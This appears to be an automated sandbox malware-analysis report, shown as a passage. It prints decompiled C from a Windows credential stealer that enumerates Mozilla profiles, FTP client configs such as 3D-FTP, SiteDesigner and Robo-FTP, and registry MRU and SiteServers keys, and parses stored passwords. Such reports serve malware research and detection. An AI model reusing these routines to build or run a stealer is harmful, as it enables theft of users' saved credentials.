                                                                    				E00409C3C(_t18, _a4,  *0x414869, "Software\\Mozilla", "Mozilla", "\\Mozilla\\Profiles\\");
                                                                    				E00409C3C(_t18, _a4, 0x80000002, "Software\\Mozilla", "Mozilla", "\\Mozilla\\Profiles\\"); // executed
                                                                    				SetCurrentDirectoryA( &_v269);
                                                                    				return E00401636(__ebx, _t18, __edi, _t20, _a4, _v8);
			}

                                                                    0x00409f8f
                                                                    0x00409f8f
                                                                    0x00409fa4
                                                                    0x00409fa7
                                                                    0x00409fbd
                                                                    0x00409fda
                                                                    0x00409ff6
                                                                    0x0040a002
                                                                    0x0040a013

                                                                    APIs
                                                                    • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409FBD
                                                                      • Part of subcall function 00409C3C: StrStrIA.SHLWAPI(?,?), ref: 00409C48
                                                                      • Part of subcall function 00409C3C: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409CBF
                                                                      • Part of subcall function 00409C3C: RegEnumKeyExA.ADVAPI32 ref: 00409CEB
                                                                      • Part of subcall function 00409C3C: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409D33
                                                                    • SetCurrentDirectoryA.KERNEL32(?,?), ref: 0040A002
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
• Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CurrentDirectory$CloseEnumOpen
                                                                    • String ID: Mozilla$Software\Mozilla$\Mozilla\Profiles\
                                                                    • API String ID: 3062143572-2716603926
                                                                    • Opcode ID: 131c71901b6e6f8efd938cc30ab034825632f74977321a3e57dc4e4074c16a30
                                                                    • Instruction ID: ad10bed4d9095064944b6f1b39750bb114de016addf6147f224309e21cc9b741
                                                                    • Opcode Fuzzy Hash: 131c71901b6e6f8efd938cc30ab034825632f74977321a3e57dc4e4074c16a30
                                                                    • Instruction Fuzzy Hash: C2F03630680208BADF50BF51CC43FCD7A659B14745F1140667A08751E3DBF9DAD19B4C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 92%
                                                                    			E0040CA59(void* __ebx, void* __ecx, intOrPtr _a4) {
                                                                    				intOrPtr _v8;
                                                                    				void* __edi;
                                                                    				void* _t10;
                                                                    				void* _t12;
                                                                    				char* _t20;
                                                                    				void* _t27;
                                                                    				void* _t28;
                                                                    				char* _t29;
                                                                    
                                                                    				_t28 = __ecx;
                                                                    				_t27 = __ebx;
                                                                    				_v8 = E004015F0(_a4, 0x42, 0);
                                                                    				_t29 =  *0x4147ed; // 0x640b38
                                                                    				if( *_t29 == 0) {
                                                                    					L5:
                                                                    					_t10 = E00401EB1(_t33, 0x23);
                                                                    					_t34 = _t10;
                                                                    					if(_t10 != 0) {
                                                                    						E00404351(_a4, E00401E4C(_t10, _t10, "\\3D-FTP"), "sites.ini", 0xbeef0000); // executed
                                                                    						E004018B8(_t17);
                                                                    					}
                                                                    					_t12 = E00401EB1(_t34, 0x23);
                                                                    					_t35 = _t12;
                                                                    					if(_t12 != 0) {
                                                                    						E00404351(_a4, E00401E4C(_t12, _t12, "\\SiteDesigner"), "sites.ini", 0xbeef0000); // executed
                                                                    						E004018B8(_t14);
                                                                    					}
                                                                    					return E00401636(_t27, _t28, _t29, _t35, _a4, _v8);
                                                                    				} else {
                                                                    					goto L1;
                                                                    				}
                                                                    				do {
                                                                    					L1:
                                                                    					_t20 = StrStrIA(_t29, "3D-FTP");
                                                                    					_t31 = _t20;
                                                                    					if(_t20 != 0) {
                                                                    						_t24 = E0040242B(_t31, _t29);
                                                                    						if(E0040242B(_t31, _t29) != 0) {
                                                                    							E00404351(_a4, _t24, "sites.ini", 0xbeef0000);
                                                                    							E004018B8(_t24);
                                                                    						}
                                                                    					}
                                                                    					asm("cld");
                                                                    					_t28 = 0xffffffff;
                                                                    					asm("repne scasb");
                                                                    					_t33 =  *_t29;
                                                                    				} while ( *_t29 != 0);
                                                                    				goto L5;
                                                                    			}

                                                                    APIs
                                                                    • StrStrIA.SHLWAPI(00640B38,3D-FTP), ref: 0040CA80
                                                                      • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                                                                      • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                                                                      • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                                                                      • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                                                                      • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrlen$FreeLocal
                                                                    • String ID: 3D-FTP$\3D-FTP$\SiteDesigner$sites.ini
                                                                    • API String ID: 1884169789-4074339522
                                                                    • Opcode ID: f1cda09d36af23cc2d8ad47fd755b2eaecaedc9644cf417539652a50c413c888
                                                                    • Instruction ID: 3a8ef14eedaa50b1c948b24bf2c7183635c18f20d59f5e60411f4875eb663bb9
                                                                    • Opcode Fuzzy Hash: f1cda09d36af23cc2d8ad47fd755b2eaecaedc9644cf417539652a50c413c888
                                                                    • Instruction Fuzzy Hash: D6119E70740105BAEF11B772CC42FAF2D599B81758F24023B7810B11E3DABCCA91A6AC
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0040AED7(intOrPtr _a4, char* _a8) {
                                                                    				void* _v8;
                                                                    				int _v12;
                                                                    				int _v16;
                                                                    				char _v20;
                                                                    				char _v2068;
                                                                    				char _v2072;
                                                                    				intOrPtr _v2076;
                                                                    				long _t36;
                                                                    				long _t37;
                                                                    				long _t40;
                                                                    
                                                                    				_t36 = RegOpenKeyA( *0x414869, _a8,  &_v8); // executed
                                                                    				_t37 = _t36;
                                                                    				if(_t37 == 0) {
                                                                    					_v12 = 0;
                                                                    					while(1) {
                                                                    						_v16 = 0x7ff;
                                                                    						_t40 = RegEnumKeyExA(_v8, _v12,  &_v2068,  &_v16, 0, 0, 0, 0);
                                                                    						_t41 = _t40;
                                                                    						if(_t40 != 0) {
                                                                    							break;
                                                                    						}
                                                                    						_v2076 = E00401DF8( &_v2068, E00401DF8(_t41, _a8, "\\"),  &_v2068);
                                                                    						E004018B8(_t42);
                                                                    						_v2072 = E00401D71( *0x414869, _v2076, "SiteServers",  &_v20);
                                                                    						__eflags = _v2072;
                                                                    						if(_v2072 == 0) {
                                                                    							L12:
                                                                    							E004018B8(_v2072);
                                                                    							E0040AED7(_a4, _v2076);
                                                                    							E004018B8(_v2076);
                                                                    							_v12 = _v12 + 1;
                                                                    							continue;
                                                                    						}
                                                                    						__eflags = _v20 - 4;
                                                                    						if(_v20 != 4) {
                                                                    							L11:
                                                                    							E004018B8(_v2072);
                                                                    							goto L12;
                                                                    						}
                                                                    						 *_t18 =  *_v2072;
                                                                    						__eflags = _v2072 - 0x3e8;
                                                                    						if(_v2072 > 0x3e8) {
                                                                    							_v2072 = 0x3e8;
                                                                    						}
                                                                    						while(1) {
                                                                    							__eflags = _v2072;
                                                                    							if(_v2072 == 0) {
                                                                    								goto L11;
                                                                    							}
                                                                    							_t21 =  &_v2072;
                                                                    							 *_t21 = _v2072 - 1;
                                                                    							__eflags =  *_t21;
                                                                    							E0040AC3E( *_t21, _a4, _v2076, _v2072);
                                                                    						}
                                                                    						goto L11;
                                                                    					}
                                                                    					return RegCloseKey(_v8);
                                                                    				}
                                                                    				return _t37;
                                                                    			}

                                                                    APIs
                                                                    • RegOpenKeyA.ADVAPI32(?,?), ref: 0040AEED
                                                                    • RegEnumKeyExA.ADVAPI32 ref: 0040AF21
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040B009
                                                                      • Part of subcall function 0040AC3E: wsprintfA.USER32 ref: 0040ACAA
                                                                      • Part of subcall function 0040AC3E: wsprintfA.USER32 ref: 0040ACBD
                                                                      • Part of subcall function 0040AC3E: wsprintfA.USER32 ref: 0040ACD0
                                                                      • Part of subcall function 0040AC3E: wsprintfA.USER32 ref: 0040ACE3
                                                                      • Part of subcall function 0040AC3E: wsprintfA.USER32 ref: 0040ACF6
                                                                      • Part of subcall function 0040AC3E: wsprintfA.USER32 ref: 0040AD09
                                                                      • Part of subcall function 0040AC3E: wsprintfA.USER32 ref: 0040AD1C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: wsprintf$CloseEnumOpen
                                                                    • String ID: SiteServers
                                                                    • API String ID: 1693054222-2402683488
                                                                    • Opcode ID: c23e4e84773bc3363ca8226b34d5d7ab8c1375c3b24122fc359739cd37375137
                                                                    • Instruction ID: a446ecacf4174ee40ccddb23f5ff2609404a5ff37a742fe041fe98d7ce509aa6
                                                                    • Opcode Fuzzy Hash: c23e4e84773bc3363ca8226b34d5d7ab8c1375c3b24122fc359739cd37375137
                                                                    • Instruction Fuzzy Hash: C131287190021DEADF21AB51CD42BDEBAB9FF04304F04C0B6B154750A1DB795BA2AF9A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00408D1E(intOrPtr _a4, void* _a8, char* _a12) {
                                                                    				void* _v8;
                                                                    				int _v12;
                                                                    				int _v16;
                                                                    				char _v2064;
                                                                    				intOrPtr _v2068;
                                                                    				intOrPtr _v2072;
                                                                    				long _t28;
                                                                    				long _t29;
                                                                    				long _t32;
                                                                    
                                                                    				_t28 = RegOpenKeyA(_a8, _a12,  &_v8); // executed
                                                                    				_t29 = _t28;
                                                                    				if(_t29 == 0) {
                                                                    					_v12 = 0;
                                                                    					while(1) {
                                                                    						_v16 = 0x7ff;
                                                                    						_t32 = RegEnumKeyExA(_v8, _v12,  &_v2064,  &_v16, 0, 0, 0, 0);
                                                                    						_t33 = _t32;
                                                                    						if(_t32 != 0) {
                                                                    							break;
                                                                    						}
                                                                    						_v2068 = E00401DF8( &_v2064, E00401DF8(_t33, _a12, "\\"),  &_v2064);
                                                                    						E004018B8(_t34);
                                                                    						_v2072 = E00401D71(_a8, _v2068, "MRU", 0);
                                                                    						if(_v2072 != 0) {
                                                                    							E00404043(_a4, _v2072, 0xbeef0001);
                                                                    						}
                                                                    						E004018B8(_v2072);
                                                                    						E00408D1E(_a4, _a8, _v2068);
                                                                    						E004018B8(_v2068);
                                                                    						_v12 = _v12 + 1;
                                                                    					}
                                                                    					return RegCloseKey(_v8);
                                                                    				}
                                                                    				return _t29;
                                                                    			}

                                                                    APIs
                                                                    • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00408D31
                                                                    • RegEnumKeyExA.ADVAPI32 ref: 00408D65
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408E04
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseEnumOpen
                                                                    • String ID: MRU
                                                                    • API String ID: 1332880857-344939820
                                                                    • Opcode ID: a218edc76d328d61fb32810b6b901dfa870d265beb811b49ef9bfa557965049c
                                                                    • Instruction ID: 0962f506e68cdd8ccaa0ff695c2f519e513318d4d31b2a5f0dea04bfe0af0b42
                                                                    • Opcode Fuzzy Hash: a218edc76d328d61fb32810b6b901dfa870d265beb811b49ef9bfa557965049c
                                                                    • Instruction Fuzzy Hash: 8821F331900108BADF11AB51CD42FDE7BBABF00304F1085BAB554B50E1DBB95B91AF98
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 90%
                                                                    			E00401C8D(void* _a4, char* _a8, char* _a12, int** _a16, intOrPtr _a20) {
                                                                    				void* _v8;
                                                                    				int _v12;
                                                                    				int _v16;
                                                                    				int** _t28;
                                                                    				long _t30;
                                                                    				char* _t33;
                                                                    				void* _t36;
                                                                    				long _t39;
                                                                    				long _t46;
                                                                    				signed int _t51;
                                                                    				char* _t53;
                                                                    
                                                                    				_t28 = _a16;
                                                                    				if(_t28 != 0) {
                                                                    					 *_t28 = 0;
                                                                    				}
                                                                    				_t53 = 0;
                                                                    				if(_a20 != 1) {
                                                                    					if(_a20 != 2) {
                                                                    						_t51 = 0;
                                                                    					} else {
                                                                    						_t51 = 0x100;
                                                                    					}
                                                                    				} else {
                                                                    					_t51 = 0x200;
                                                                    				}
                                                                    				_t30 = RegOpenKeyExA(_a4, _a8, 0, _t51 | 0x00020019,  &_v8); // executed
                                                                    				if(_t30 == 0) {
                                                                    					_t39 = RegQueryValueExA(_v8, _a12, 0,  &_v16, 0,  &_v12); // executed
                                                                    					if(_t39 == 0 && _v12 != 0 && (_v16 != 1 || _v12 != 1)) {
                                                                    						_t53 = E004018CF(_v12 + 1);
                                                                    						_t46 = RegQueryValueExA(_v8, _a12, 0, 0, _t53,  &_v12); // executed
                                                                    						if(_t46 == 0) {
                                                                    							if(_a16 != 0) {
                                                                    								_push(_v12);
                                                                    								_pop( *__eax);
                                                                    							}
                                                                    						} else {
                                                                    							E004018B8(_t53);
                                                                    							_t53 = 0;
                                                                    						}
                                                                    					}
                                                                    					RegCloseKey(_v8); // executed
                                                                    				}
                                                                    				_t33 = _t53;
                                                                    				if(_t33 != 0 || _a20 >= 2) {
                                                                    					return _t33;
                                                                    				} else {
                                                                    					_t36 = E00401C8D(_a4, _a8, _a12, _a16, _a20 + 1); // executed
                                                                    					return _t36;
                                                                    				}
                                                                    			}

                                                                    APIs
                                                                    • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00401CD2
                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,00000000,?,?), ref: 00401CED
                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000,00000001,?,?,00000000,?,00000000,?,?,?,00000000), ref: 00401D23
                                                                    • RegCloseKey.ADVAPI32(?,?,?,00000000,?,00000000,?,?,?,00000000,?,?), ref: 00401D45
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: QueryValue$CloseOpen
                                                                    • String ID:
                                                                    • API String ID: 1586453840-0
                                                                    • Opcode ID: 4c5cc07ac999bb8c229a9380f604c2600749c7e7e9e739a1729e69d1632d573e
                                                                    • Instruction ID: f684edda37e69a729a9dfe3678b60f116084d598a8b6b39bf51dbd963b68634d
                                                                    • Opcode Fuzzy Hash: 4c5cc07ac999bb8c229a9380f604c2600749c7e7e9e739a1729e69d1632d573e
                                                                    • Instruction Fuzzy Hash: 36213C31A00109BBEF229E60CD81BAE3BBAEF41344F144076F910A61E0D678EA95DB59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 75%
                                                                    			E0040BE0B(void* __ebx, void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                    				char _v8;
                                                                    				char _v12;
                                                                    				char _v16;
                                                                    				intOrPtr _v20;
                                                                    				intOrPtr _v24;
                                                                    				char _v28;
                                                                    				void* _t34;
                                                                    				void* _t49;
                                                                    
                                                                    				if(_a16 == 5) {
                                                                    					_t34 = E0040B552(_a12, 2,  &_v8,  &_v12,  &_v16);
                                                                    					if(_v12 == 1) {
                                                                    						_push(_v16);
                                                                    						_pop( *_t8);
                                                                    						_push("logins");
                                                                    						_push(_v20);
                                                                    						L00410712();
                                                                    						_t34 = _t34;
                                                                    						if(_t34 == 0) {
                                                                    							_t34 = E0040B552(_a12, 0,  &_v8,  &_v12,  &_v16);
                                                                    							if(_v12 == 1) {
                                                                    								_push(_v16);
                                                                    								_push("table");
                                                                    								L004106EE();
                                                                    								_t34 = _t34;
                                                                    								if(_t34 == 0) {
                                                                    									_t34 = E0040B552(_a12, 3,  &_v8,  &_v12,  &_v16);
                                                                    									if(_v12 == 0) {
                                                                    										 *_t22 =  *_v16;
                                                                    										_t34 = E0040B552(_a12, 4,  &_v8,  &_v12,  &_v16);
                                                                    										if(_v12 == 1) {
                                                                    											 *0x418e9c = 0xffffffff;
                                                                    											 *0x418ea0 = 0xffffffff;
                                                                    											 *0x418ea4 = 0xffffffff;
                                                                    											_t34 = E0040BAF7(_v16);
                                                                    											_v28 = 1;
                                                                    											if( *0x418e9c != 0xffffffff &&  *0x418ea0 != 0xffffffff &&  *0x418ea4 != 0xffffffff) {
                                                                    												_t49 = E0040B736(__ebx, __ecx, _a4, _a8, _v24,  &_v28, E0040BC36); // executed
                                                                    												return _t49;
                                                                    											}
                                                                    										}
                                                                    									}
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				return _t34;
                                                                    			}

                                                                    APIs
                                                                    • lstrcmpi.KERNEL32(00000000,logins), ref: 0040BE49
                                                                    • lstrcmp.KERNEL32 ref: 0040BE7E
                                                                      • Part of subcall function 0040BAF7: StrStrIA.SHLWAPI(?,() ), ref: 0040BB07
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcmplstrcmpi
                                                                    • String ID: logins$table
                                                                    • API String ID: 3524194181-3800951466
                                                                    • Opcode ID: 148570ffec1f25e65078e6191b76618e9bbeb353fec0d617c32987c936426af4
                                                                    • Instruction ID: 4e1aa7e609f9c63133400eaf0fbab0bfe716398796ba7bb72f53a7a8be838654
                                                                    • Opcode Fuzzy Hash: 148570ffec1f25e65078e6191b76618e9bbeb353fec0d617c32987c936426af4
                                                                    • Instruction Fuzzy Hash: FB31E97581020EFACF21DF94CC469EEBB79EB04328F204276A121B61E0D7759A54DF9C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 90%
                                                                    			E00406FBB(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                                    				intOrPtr _v8;
                                                                    				intOrPtr _v12;
                                                                    				char _v20;
                                                                    				char* _v24;
                                                                    				char* _v28;
                                                                    				void* _t19;
                                                                    				void* _t20;
                                                                    				intOrPtr* _t23;
                                                                    				intOrPtr* _t27;
                                                                    				intOrPtr* _t29;
                                                                    				char* _t31;
                                                                    				void* _t37;
                                                                    				char _t39;
                                                                    				char* _t40;
                                                                    
                                                                    				_t37 = __ecx;
                                                                    				_t19 = E00401F36(_a8); // executed
                                                                    				_t20 = _t19;
                                                                    				if(_t20 != 0) {
                                                                    					_t23 = E00401FFD(__eflags, _a8,  &_v20);
                                                                    					__eflags = _t23;
                                                                    					if(_t23 != 0) {
                                                                    						_v24 = E004018CF(_v8);
                                                                    						E00401906(_v12, _v24, _v8);
                                                                    						_t40 = _v24;
                                                                    						while(1) {
                                                                    							__eflags =  *_t40;
                                                                    							if( *_t40 == 0) {
                                                                    								break;
                                                                    							}
                                                                    							_t27 = StrStrIA(_t40, "\"password\" : \"");
                                                                    							__eflags = _t27;
                                                                    							if(_t27 != 0) {
                                                                    								_push("\"password\" : \"");
                                                                    								L0041066A();
                                                                    								_t40 = _t27 + _t27;
                                                                    								_v28 = _t40;
                                                                    								_t29 = StrStrIA(_t40, "\",");
                                                                    								__eflags = _t29;
                                                                    								if(__eflags != 0) {
                                                                    									 *_t29 = 0;
                                                                    									_push( *_t29);
                                                                    									E00406F43(_t29, _t37, __eflags, _a4, _v28);
                                                                    									_pop(_t39);
                                                                    									_t31 = _t29;
                                                                    									 *_t31 = _t39;
                                                                    									continue;
                                                                    								}
                                                                    								break;
                                                                    							}
                                                                    							break;
                                                                    						}
                                                                    						E00401569(_a4, 0xbeef1001);
                                                                    						E0040159F(_a4, _v24, _v8);
                                                                    						E004018B8(_v24);
                                                                    						return E00402091( &_v20);
                                                                    					}
                                                                    					return _t23;
                                                                    				} else {
                                                                    					return _t20;
                                                                    				}
                                                                    			}

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: "password" : "
                                                                    • API String ID: 0-2310853927
                                                                    • Opcode ID: 6fd4af748b8573febd7bcca386ce731f7469ffd517da67a06c032a95694d9d11
                                                                    • Instruction ID: bee61a90249f81009c8457dd16d7b53d7f9fc3dd6c708c4ffa186b800f2db450
                                                                    • Opcode Fuzzy Hash: 6fd4af748b8573febd7bcca386ce731f7469ffd517da67a06c032a95694d9d11
                                                                    • Instruction Fuzzy Hash: 2C21CF71C08109FECF11BBA18C029EE7E66AF41358F204137F400B51A1E3794B91A7AA
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 85%
                                                                    			E0040D2CB(intOrPtr _a4, intOrPtr _a8) {
                                                                    				char _v8;
                                                                    				intOrPtr _v12;
                                                                    				char _v32;
                                                                    				intOrPtr* _t16;
                                                                    				intOrPtr* _t17;
                                                                    				void* _t22;
                                                                    				void* _t26;
                                                                    
                                                                    				_t16 = E00401D71(_a8, "SOFTWARE\\Robo-FTP 3.7\\Scripts", "FTP Count",  &_v8); // executed
                                                                    				_t17 = _t16;
                                                                    				if(_t17 != 0) {
                                                                    					_push(_t17);
                                                                    					if(_v8 != 4) {
                                                                    						L9:
                                                                    						return E004018B8();
                                                                    					}
                                                                    					 *_t4 =  *_t17;
                                                                    					if(_v12 > 0x1f4) {
                                                                    						_v12 = 0x1f4;
                                                                    					}
                                                                    					while(_v12 != 0) {
                                                                    						wsprintfA( &_v32, "FTP File%d", _v12);
                                                                    						_t26 = _t26 + 0xc;
                                                                    						_t22 = E00401D71(_a8, "SOFTWARE\\Robo-FTP 3.7\\Scripts",  &_v32, 0);
                                                                    						_t23 = _t22;
                                                                    						if(_t22 != 0) {
                                                                    							E0040406C(_a4, _t23, 0xbeef0001);
                                                                    							E004018B8(_t23);
                                                                    						}
                                                                    						_v12 = _v12 - 1;
                                                                    					}
                                                                    					goto L9;
                                                                    				}
                                                                    				return _t17;
                                                                    			}

                                                                    APIs
                                                                    • wsprintfA.USER32 ref: 0040D315
                                                                      • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeLocalwsprintf
                                                                    • String ID: FTP Count$FTP File%d$SOFTWARE\Robo-FTP 3.7\Scripts
                                                                    • API String ID: 988369812-376751567
                                                                    • Opcode ID: 0fa57847abe90e886d72a0776039240488e35965e57a2dbfa00e81f40d4b0655
                                                                    • Instruction ID: 199b26d5468ed6bde52246b1b6ef23e8a9f49e1214d4f7d1b5726db887637ddc
                                                                    • Opcode Fuzzy Hash: 0fa57847abe90e886d72a0776039240488e35965e57a2dbfa00e81f40d4b0655
                                                                    • Instruction Fuzzy Hash: 62015E71D40109FAEF00BAD0CC82EEE7B79AB00718F508476F910B11D1D7BD9B98DA6A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 76%
                                                                    			E00401226(void* __eax) {
                                                                    				void* _t12;
                                                                    				void* _t13;
                                                                    				long _t16;
                                                                    				void* _t24;
                                                                    				void* _t25;
                                                                    
                                                                    				_t12 = __eax;
                                                                    				_push(0);
                                                                    				_push(3);
                                                                    				_push(0);
                                                                    				_push(3);
                                                                    				_push(0x80000000);
                                                                    				ExitProcess( *(_t25 + 8)); // executed
                                                                    				 *(_t25 - 4) = _t12;
                                                                    				_t13 = _t12 + 1;
                                                                    				if(_t13 != 0) {
                                                                    					while(1) {
                                                                    						_t16 = ReadFile( *(_t25 - 4), _t25 - 0x1008, 0x1000, _t25 - 8, 0); // executed
                                                                    						__eflags = _t16;
                                                                    						if(__eflags == 0) {
                                                                    							break;
                                                                    						}
                                                                    						E0040118C(_t25 - 0x1008, _t24, __eflags,  *((intOrPtr*)(_t25 + 0xc)), _t25 - 0x1008,  *(_t25 - 8)); // executed
                                                                    						__eflags =  *(_t25 - 8);
                                                                    						if( *(_t25 - 8) != 0) {
                                                                    							continue;
                                                                    						} else {
                                                                    							CloseHandle( *(_t25 - 4));
                                                                    							return 1;
                                                                    						}
                                                                    						goto L6;
                                                                    					}
                                                                    					CloseHandle( *(_t25 - 4));
                                                                    					__eflags = 0;
                                                                    					return 0;
                                                                    				} else {
                                                                    					return _t13;
                                                                    				}
                                                                    				L6:
                                                                    			}

                                                                    APIs
                                                                    • ExitProcess.KERNEL32(?,80000000,00000003,00000000,00000003,00000000), ref: 00401236
                                                                    • ReadFile.KERNEL32(?,?,00001000,?,00000000,?,80000000,00000003,00000000,00000003,00000000), ref: 0040125A
                                                                    • CloseHandle.KERNEL32(?,?,?,00001000,?,00000000,?,80000000,00000003,00000000,00000003,00000000), ref: 00401266
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp
                                                                    • Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseExitFileHandleProcessRead
                                                                    • String ID:
                                                                    • API String ID: 1390701169-0
                                                                    • Opcode ID: 01f3c162f4711ba5c2a48e9f8477b930ae4739685a5279cda6f8647624262369
                                                                    • Instruction ID: 77f65db424b8dbfecb4d9d0992eed673c7479144c9e59104ccc0ab534344ee26
                                                                    • Opcode Fuzzy Hash: 01f3c162f4711ba5c2a48e9f8477b930ae4739685a5279cda6f8647624262369
                                                                    • Instruction Fuzzy Hash: D6F0FF31940108BADF21AB50CC42FDD7A78AB64349F1080A6B544F50E0D6B99BE49B54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0040FD78(char* __ebx, void* __ecx, void* __edx, void* __eflags) {
                                                                    				void* _t26;
                                                                    				char* _t32;
                                                                    				char* _t34;
                                                                    				char* _t37;
                                                                    				void* _t41;
                                                                    				char* _t43;
                                                                    				void* _t44;
                                                                    
                                                                    				_t41 = __edx;
                                                                    				_t40 = __ecx;
                                                                    				_t37 = __ebx;
                                                                    				E00403FFB(); // executed
                                                                    				 *(_t44 - 0x14) = 0;
                                                                    				_t26 = E00401000(_t44 - 0x14, __ecx, __eflags, _t44 - 0x14);
                                                                    				_t48 =  *(_t44 - 0x14);
                                                                    				if( *(_t44 - 0x14) == 0) {
                                                                    					_t26 = E00401000(_t44 - 0x14, __ecx, _t48, _t44 - 0x14);
                                                                    					_t49 =  *(_t44 - 0x14);
                                                                    					if( *(_t44 - 0x14) == 0) {
